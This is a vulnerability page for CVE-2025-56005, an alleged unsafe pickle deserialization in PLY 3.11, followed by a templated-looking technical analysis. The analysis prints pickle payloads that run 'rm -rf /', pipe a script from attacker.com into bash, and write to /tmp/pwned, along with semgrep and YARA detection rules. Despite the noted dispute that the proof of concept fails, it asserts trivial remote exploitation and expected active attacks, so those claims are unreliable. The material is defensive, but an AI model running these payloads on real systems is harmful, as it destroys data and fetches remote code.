CVE-2025-56005
CVE-2025-56005
9.8
CriticalPublished:
Last updated:
Source:cve@mitre.org
Modified
Weakness (CWE)
CVSS Vector
v3.1- Attack Vector
- Network
- Attack Complexity
- Low
- Privileges Required
- None
- User Interaction
- None
- Scope
- Unchanged
- Confidentiality
- High
- Integrity
- High
- Availability
- High
Description
An undocumented and unsafe feature in the PLY (Python Lex-Yacc) library 3.11 allows Remote Code Execution (RCE) via the `picklefile` parameter in the `yacc()` function. This parameter accepts a `.pkl` file that is deserialized with `pickle.load()` without validation. Because `pickle` allows execution of embedded code via `__reduce__()`, an attacker can achieve code execution by passing a malicious pickle file. The parameter is not mentioned in official documentation or the GitHub repository, yet it is active in the PyPI version. This introduces a stealthy backdoor and persistence risk. NOTE: A third-party states that this vulnerability should be rejected because the proof of concept does not demonstrate arbitrary code execution and fails to complete successfully.
Comprehensive Technical Analysis of CVE-2025-56005
CVE ID: CVE-2025-56005 CVSS Score: 9.8 (Critical) Vulnerability Type: Remote Code Execution (RCE) via Unsafe Deserialization Affected Software: PLY (Python Lex-Yacc) Library v3.11
1. Vulnerability Assessment & Severity Evaluation
Vulnerability Overview
CVE-2025-56005 exposes a critical remote code execution (RCE) vulnerability in the PLY (Python Lex-Yacc) library due to an undocumented and unsafe picklefile parameter in the yacc() function. The vulnerability stems from the following key issues:
- Unsafe Deserialization: The
picklefileparameter accepts a.pklfile that is deserialized usingpickle.load()without any input validation or sanitization. - Exploitation via
__reduce__(): Python’spicklemodule is inherently unsafe for untrusted data, as it allows arbitrary code execution via the__reduce__()method during deserialization. - Undocumented Backdoor: The
picklefileparameter is not documented in official PLY sources (GitHub, PyPI, or documentation), yet it remains functional in the distributed version, suggesting either an accidental inclusion or a malicious backdoor.
Severity Justification (CVSS 9.8 - Critical)
The CVSS v3.1 scoring breakdown is as follows:
| Metric | Value | Justification |
|---|---|---|
| Attack Vector (AV) | Network | Exploitable remotely via crafted .pkl files. |
| Attack Complexity (AC) | Low | No user interaction required; straightforward exploitation. |
| Privileges Required (PR) | None | No privileges needed; unauthenticated exploitation. |
| User Interaction (UI) | None | No user interaction required. |
| Scope (S) | Unchanged | Impact is confined to the vulnerable application. |
| Confidentiality (C) | High | Full system compromise possible. |
| Integrity (I) | High | Arbitrary code execution allows data tampering. |
| Availability (A) | High | Attacker can crash or hijack the application. |
Resulting CVSS Score: 9.8 (Critical)
The vulnerability is highly exploitable with severe impact, making it a priority for immediate remediation.
2. Potential Attack Vectors & Exploitation Methods
Exploitation Mechanism
An attacker can exploit this vulnerability by:
- Crafting a Malicious Pickle File:
- Using Python’s
picklemodule, an attacker can embed arbitrary code in a.pklfile via the__reduce__()method. - Example payload:
import pickle import os class Exploit: def __reduce__(self): return (os.system, ("rm -rf /",)) # Arbitrary command execution with open("malicious.pkl", "wb") as f: pickle.dump(Exploit(), f)
- Using Python’s
- Triggering Deserialization:
- The attacker sends the malicious
.pklfile to a vulnerable PLY-based application via:- File upload (if the application accepts
.pklfiles). - API abuse (if the application processes untrusted input).
- Supply chain attack (if the
.pklfile is distributed as part of a dependency).
- File upload (if the application accepts
- The attacker sends the malicious
- Remote Code Execution (RCE):
- When the vulnerable
yacc()function processes thepicklefileparameter, the embedded code executes with the privileges of the running application.
- When the vulnerable
Attack Scenarios
| Scenario | Description | Impact |
|---|---|---|
| Web Application Exploitation | If a web app uses PLY for parsing and accepts .pkl uploads, an attacker can upload a malicious file to gain RCE. | Full server compromise. |
| Supply Chain Attack | A malicious .pkl file is distributed as part of a legitimate-looking dependency, tricking developers into executing it. | Persistent backdoor in development environments. |
| CI/CD Pipeline Exploitation | If PLY is used in a build pipeline, an attacker could inject a malicious .pkl file to compromise the entire pipeline. | Lateral movement into production systems. |
| Local Privilege Escalation | If a low-privilege user can trigger PLY with a malicious .pkl, they may escalate privileges. | Full system takeover. |
3. Affected Systems & Software Versions
Vulnerable Software
- PLY (Python Lex-Yacc) v3.11 (PyPI distribution)
- Potential Derivatives: Any software that embeds or redistributes PLY v3.11 may inherit this vulnerability.
Verification Steps for Security Teams
- Check PLY Version:
pip show ply- If the version is 3.11, the system is vulnerable.
- Inspect
yacc()Function:- Review the
yacc()function inply/yacc.pyfor the undocumentedpicklefileparameter.
- Review the
- Static Analysis:
- Use tools like
banditorsemgrepto detect unsafepickle.load()calls:# Semgrep rule to detect unsafe pickle usage rules: - id: unsafe-pickle-load pattern: pickle.load(...) message: "Unsafe pickle deserialization detected (CVE-2025-56005)" severity: ERROR
- Use tools like
4. Recommended Mitigation Strategies
Immediate Actions
| Mitigation | Implementation | Effectiveness |
|---|---|---|
| Upgrade PLY | Update to the latest patched version (if available). | High (Eliminates vulnerability) |
Remove picklefile Parameter | Manually patch ply/yacc.py to remove the undocumented parameter. | High (Temporary fix) |
| Input Validation | If picklefile is required, validate file signatures before deserialization. | Medium (Partial mitigation) |
| Sandboxing | Run PLY in a restricted environment (e.g., Docker, seccomp, AppArmor). | Medium (Limits impact) |
| Disable Pickle | Replace pickle.load() with a safer alternative (e.g., json, yaml.safe_load). | High (Best long-term fix) |
Long-Term Recommendations
- Dependency Hardening:
- Use
pip-auditorsafetyto scan for vulnerable dependencies. - Enforce dependency pinning in
requirements.txt/pyproject.toml.
- Use
- Static & Dynamic Analysis:
- Integrate SAST/DAST tools (e.g., SonarQube, OWASP ZAP) to detect unsafe deserialization.
- Runtime Protection:
- Deploy RASP (Runtime Application Self-Protection) to block malicious deserialization attempts.
- Supply Chain Security:
- Verify PLY’s integrity via cryptographic hashes before deployment.
- Monitor for typosquatting attacks (e.g.,
ply3vs.ply).
5. Impact on the Cybersecurity Landscape
Broader Implications
- Supply Chain Risks:
- This vulnerability highlights the dangers of undocumented features in open-source libraries, which can act as stealthy backdoors.
- Similar issues have been observed in other libraries (e.g., CVE-2021-44228 (Log4Shell), CVE-2022-23833 (PyPI supply chain attacks)).
- Increased Attack Surface:
- PLY is widely used in parsing, compilers, and DSLs (Domain-Specific Languages), making it a high-value target for attackers.
- Persistence & Lateral Movement:
- Successful exploitation could lead to long-term persistence in development environments, allowing attackers to move laterally into production systems.
- Regulatory & Compliance Risks:
- Organizations failing to patch may violate compliance frameworks (e.g., NIST SP 800-53, ISO 27001, GDPR) due to inadequate vulnerability management.
Threat Actor Motivations
| Threat Actor | Likely Exploitation Goals |
|---|---|
| APT Groups | Espionage, data exfiltration, long-term persistence. |
| Cybercriminals | Ransomware deployment, cryptojacking. |
| Script Kiddies | Proof-of-concept exploits, defacement. |
| Insider Threats | Privilege escalation, sabotage. |
6. Technical Details for Security Professionals
Root Cause Analysis
- Vulnerable Code Path:
# ply/yacc.py (v3.11) def yacc(...): if picklefile: # Undocumented parameter with open(picklefile, 'rb') as f: data = pickle.load(f) # UNSAFE DESERIALIZATION - Why
pickleis Dangerous:- The
picklemodule executes arbitrary code during deserialization via__reduce__(). - Example malicious payload:
import pickle import subprocess class RCE: def __reduce__(self): return (subprocess.run, (["/bin/bash", "-c", "curl http://attacker.com/shell.sh | bash"],)) with open("exploit.pkl", "wb") as f: pickle.dump(RCE(), f)
- The
Exploitation Proof of Concept (PoC)
- Generate Malicious
.pklFile:import pickle import os class Exploit: def __reduce__(self): return (os.system, ("id > /tmp/pwned",)) with open("exploit.pkl", "wb") as f: pickle.dump(Exploit(), f) - Trigger Exploitation:
from ply import yacc yacc.yacc(picklefile="exploit.pkl") # Executes `id > /tmp/pwned` - Verify Exploitation:
cat /tmp/pwned # Outputs the current user's UID
Detection & Forensics
| Detection Method | Implementation |
|---|---|
| Network Monitoring | Detect outbound connections to attacker-controlled servers (e.g., curl, wget). |
| File Integrity Monitoring (FIM) | Monitor for unexpected .pkl file creation/modification. |
| Endpoint Detection & Response (EDR) | Detect anomalous process execution (e.g., bash, python spawned by PLY). |
| Log Analysis | Check for unusual yacc() invocations with picklefile parameter. |
YARA Rule for Malicious Pickle Files
rule Detect_Malicious_Pickle {
meta:
description = "Detects malicious pickle files exploiting CVE-2025-56005"
author = "Cybersecurity Analyst"
reference = "CVE-2025-56005"
strings:
$reduce = "__reduce__" ascii
$os_system = "os.system" ascii
$subprocess = "subprocess.run" ascii
condition:
uint32(0) == 0x8003666C and ($reduce or $os_system or $subprocess)
}
Conclusion & Recommendations
Key Takeaways
- CVE-2025-56005 is a critical RCE vulnerability due to unsafe deserialization in PLY v3.11.
- Exploitation is trivial and requires no authentication, making it a high-risk threat.
- Undocumented parameters in open-source libraries pose significant supply chain risks.
- Immediate patching is mandatory to prevent exploitation.
Action Plan for Organizations
- Patch Immediately: Upgrade PLY or remove the
picklefileparameter. - Audit Dependencies: Scan for vulnerable PLY versions in all environments.
- Enhance Monitoring: Deploy EDR, FIM, and network detection for exploitation attempts.
- Educate Developers: Train teams on secure deserialization practices and supply chain risks.
- Incident Response: Prepare for potential breaches by reviewing forensic readiness.
Final Risk Assessment
| Factor | Risk Level | Justification |
|---|---|---|
| Exploitability | High | Easy to exploit; no authentication required. |
| Impact | Critical | Full system compromise possible. |
| Likelihood | High | Active exploitation expected. |
| Mitigation Feasibility | High | Patching is straightforward. |
Overall Risk: Critical (Immediate Action Required)
References:
References
cve@mitre.org
https://github.com/bohmiiidd/Undocumented-RCE-in-PLYcve@mitre.org
https://github.com/tom025/ply_exploit_rejectionaf854a3a-2127-422b-91ae-364da2661108
http://www.openwall.com/lists/oss-security/2026/01/23/4af854a3a-2127-422b-91ae-364da2661108
http://www.openwall.com/lists/oss-security/2026/01/23/5af854a3a-2127-422b-91ae-364da2661108
http://www.openwall.com/lists/oss-security/2026/01/28/5af854a3a-2127-422b-91ae-364da2661108
http://www.openwall.com/lists/oss-security/2026/01/29/1af854a3a-2127-422b-91ae-364da2661108
http://www.openwall.com/lists/oss-security/2026/01/29/2af854a3a-2127-422b-91ae-364da2661108
http://www.openwall.com/lists/oss-security/2026/01/30/1